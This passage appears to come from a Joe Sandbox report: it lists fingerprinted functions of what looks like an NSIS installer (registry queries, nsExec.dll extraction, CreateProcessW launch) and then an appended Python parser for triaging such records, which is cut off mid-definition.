                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: b9be4b9816400704253340fdef464e42764e8bcf27a5cbf30c6b9d2bcde2083a
                                                                        • Instruction ID: 62a37a396924b9b833916b179176740e0848b2f5cedec3081aefe4e9105dc113
                                                                        • Opcode Fuzzy Hash: b9be4b9816400704253340fdef464e42764e8bcf27a5cbf30c6b9d2bcde2083a
                                                                        • Instruction Fuzzy Hash: F0F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A09
                                                                        • wsprintfW.USER32 ref: 00404A12
                                                                        • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                        • Instruction ID: 6b2e2e184c3c611d12d6b53aa9198873543b26f6782fca7c8cbe4a2e3a07221a
                                                                        • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                                        • Instruction Fuzzy Hash: 1411E2736001243BCB10A66D9C45EEF368D9BC6334F180637FA29F61D1DA799C2186EC
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                        • Instruction ID: 3450dd174e4bd499bd5dd80d9ee349d4783428bbf063aee010979b0fef1ae38f
                                                                        • Opcode Fuzzy Hash: 5e1f230eecded0db815b532ef795033685ed3b5cfc855201c3a552c7fdd4c815
                                                                        • Instruction Fuzzy Hash: D8217471A44109BEEF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,ExecToStack,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405DE1
                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405E02
                                                                        • RegCloseKey.ADVAPI32(?,?,0040602A,80000002,Software\Microsoft\Windows\CurrentVersion,?,ExecToStack,?), ref: 00405E25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: ExecToStack
                                                                        • API String ID: 3677997916-166031814
                                                                        • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                        • Instruction ID: 2fd967afc3cf920b801d0ff69ba4d64ac6492d281fb7c7a5729fe10eb95daac3
                                                                        • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                        • Instruction Fuzzy Hash: F4011A3255020AEADB219F56ED09EDB3BACEF85350F00403AF945D6260D335EA64DBF9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 0040593B
                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00405945
                                                                        • lstrcatW.KERNEL32(?,00409014), ref: 00405957
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405935
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2659869361-3081826266
                                                                        • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                        • Instruction ID: 6247f5a3c9563be90945cd41d23768fa590745b080056b24a315d5606c671452
                                                                        • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                        • Instruction Fuzzy Hash: E5D05E21101921AAC21277448C04DDF669CEE45300384002AF200B20A2CB7C1D518BFD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                        • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                        • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                          • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1404258612-0
                                                                        • Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                        • Instruction ID: 0d64a3d5d22a86ce83a9b45ae5cd800923300da454a86426803db7941f711343
                                                                        • Opcode Fuzzy Hash: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
                                                                        • Instruction Fuzzy Hash: 76113675A00208AFDB00DFA5C945DAEBBB9EF04344F20407AF905F62A1D7349E50CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                          • Part of subcall function 00405665: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                          • Part of subcall function 00405665: CloseHandle.KERNEL32(?), ref: 00405697
                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 3585118688-0
                                                                        • Opcode ID: 9cf1b004e652727917d33817f691773bcc02be4157d63994a5243a47c86c3d19
                                                                        • Instruction ID: 1710045f99402437403c6baccff52884d9c8abed8acdccfc98223cb8aca5cd2d
                                                                        • Opcode Fuzzy Hash: 9cf1b004e652727917d33817f691773bcc02be4157d63994a5243a47c86c3d19
                                                                        • Instruction Fuzzy Hash: DC11A171D04204EBCF109FA0CD459DE7AB5EB04318F20447BE505B61E0C3798A82DF99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 00405137
                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 00405188
                                                                          • Part of subcall function 0040417B: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                        • Instruction ID: e96fcdb8fef6e8ad8397e3324e9c6cbe2a99463e9dbc89d2689884753c01e048
                                                                        • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                                        • Instruction Fuzzy Hash: 9C019E71A00608AFDF215F11DD84FAB3A26EB84354F104136FA007E2E0C37A8C929E69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
                                                                        • CloseHandle.KERNEL32(?), ref: 00405697
                                                                        Strings
                                                                        • Error launching installer, xrefs: 00405678
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateHandleProcess
                                                                        • String ID: Error launching installer
                                                                        • API String ID: 3712363035-66219284
                                                                        • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                        • Instruction ID: c7c859a2db999ab7639828e98f3e535764a8332e37e79a8a612d2f3195062982
                                                                        • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                                        • Instruction Fuzzy Hash: 19E0ECB4A01209AFEB009F64EC49A6B7BBCEB00744B908921A914F2250D778E8108A7D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF2EE0,004037F6,74DF3420,00403621,?), ref: 00403839
                                                                        • GlobalFree.KERNEL32(?), ref: 00403840
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403831
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Free$GlobalLibrary
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 1100898210-3081826266
                                                                        • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                        • Instruction ID: bf490ea997193b46d556285b385326fb3516ec302950e4cd11f154ac4515a356
                                                                        • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                                        • Instruction Fuzzy Hash: F9E0C23394102057C7216F15ED04B1ABBE86F89B22F018476F9407B7A283746C528BED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

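The function records in this report all follow one fixed layout: an APIs list (direct calls plus indented "Part of subcall function" lines for callees), an optional Strings list, the memory-dump source, the IDA plugin snapshot, the Similarity fingerprints and a uniqueness score. The parser below is an added example, not Joe Sandbox's own code or tooling. It reads that layout from a text copy of the report, keeps direct calls apart from subcall lines, strips the "Download File" link text that a page copy leaves on Associated entries, and then uses the records for two triage tasks: listing every function that launches a child process together with the literal arguments reaching it (the CreateProcessW wrapper carrying "Error launching installer" above), and indexing records by API String ID, the key the report uses for function matching. The sample input is two records copied from this page, trimmed to the fields the parser reads; the set of process-launching APIs is my assumption.

```python
import re
from collections import defaultdict

# Constructed sample: the GetFileVersionInfo helper and the CreateProcessW
# wrapper from this report, trimmed. One Associated entry keeps the page's
# "Download File" link residue so the parser can be seen stripping it.
SAMPLE = r"""
APIs
• GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
• GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
• GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
• VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
  • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
Memory Dump Source
• Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
• String ID:
• API String ID: 1404258612-0
• Opcode ID: 0759821644e88925b44a7e9fb1563554894f113fe06b33f49c2a0c28299a5465
Uniqueness

Uniqueness Score: -1.00%
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 0040568A
• CloseHandle.KERNEL32(?), ref: 00405697
Strings
• Error launching installer, xrefs: 00405678
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
Uniqueness

Uniqueness Score: -1.00%
"""

# "Part of subcall function X:" is optional; so is the argument list
# (the report prints "wsprintfW.USER32 ref: ..." with no parentheses).
API_LINE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]{8})$")
STRING_LINE = re.compile(r"^(?P<value>.*), xrefs: (?P<xrefs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
HEX8 = re.compile(r"[0-9A-F]{8}")
LAUNCH_APIS = {"CreateProcessW", "CreateProcessA", "ShellExecuteExW", "WinExec"}  # assumed set


def parse_records(text):
    """Split a text copy of the report into one dict per function record."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            if section == "APIs":  # every record opens with its API list
                cur = {"apis": [], "strings": [], "meta": {"Associated": []}}
                records.append(cur)
            continue
        if cur is None:
            continue
        line = line.lstrip("• ").strip()  # bullets, including the indented subcall ones
        if section == "APIs":
            if m := API_LINE.match(line):
                d = m.groupdict()
                d["args"] = d["args"].split(",") if d["args"] else []
                cur["apis"].append(d)
        elif section == "Strings":
            if m := STRING_LINE.match(line):
                cur["strings"].append((m["value"], m["xrefs"].split(", ")))
        elif section == "Uniqueness":
            if line.startswith("Uniqueness Score:"):
                cur["meta"]["uniqueness"] = float(line.split(":", 1)[1].strip().rstrip("%"))
        else:
            key, _, value = line.partition(":")
            value = value.strip().removesuffix("Download File")  # page link residue
            if key == "Associated":
                cur["meta"]["Associated"].append(value)
            else:
                cur["meta"][key.strip()] = value
    return records


def direct_apis(record):
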